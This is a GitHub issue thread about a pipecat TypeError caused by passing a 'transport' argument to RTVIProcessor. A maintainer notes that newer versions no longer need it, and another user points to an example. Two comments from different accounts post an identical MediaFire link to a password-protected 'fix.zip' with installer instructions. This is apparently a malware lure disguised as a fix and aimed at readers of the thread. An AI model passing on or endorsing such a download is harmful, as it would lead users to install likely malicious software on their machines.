### ISSUE TITLE
TypeError: RTVIProcessor.__init__() got an unexpected keyword argument 'transport'

### ISSUE THREAD

**Issue by sadimoodi** [pipecat-ai/pipecat#420]
I am getting this error below when running  .py files that contain the following code:

```
from pipecat.processors.frameworks.rtvi import (
    RTVIConfig,
    RTVIProcessor,
    RTVIServiceConfig,
    RTVIServiceOptionConfig)

rtai = RTVIProcessor(transport=transport)
```
, it seems like the RTVI.py file contains a class (RTVIProcessor) which does not accept "transport" as a parameter in the constructor, how to fix this?

Error:
rtai = RTVIProcessor(transport=transport)
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: RTVIProcessor.init() got an unexpected keyword argument 'transport'

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aconchillo** [comment]
Hi @sadimoodi . Sorry you ran into this. The latest version of `RTVIPRocessor` doesn't require a `transport` argument.

**Comment by jzfree** [comment]
> Hi @sadimoodi . Sorry you ran into this. The latest version of `RTVIPRocessor` doesn't require a `transport` argument.

Any examples of using the latest version of RTVIProcessor?

**Comment by jzfree** [comment]
> Hi @sadimoodi . Sorry you ran into this. The latest version of `RTVIPRocessor` doesn't require a `transport` argument.


Hi, Any examples of using the latest version of RTVIProcessor?

**Comment by qtangs** [comment]
> can u pls refer me to any example that uses RTVI using the latest version of pipecat = 0.0.41? i cant find any

In case you haven't seen it, it's here: https://github.com/kwindla/ai-tinkerers-demo-2024-08/blob/9fe7de780a3fe02e715751af312d8506afe080fb/bot/pipeline.py#L85

**Comment by aconchillo** [comment]
Thanks! I think this can be closed now since newer version have been released with this issue already fixed.
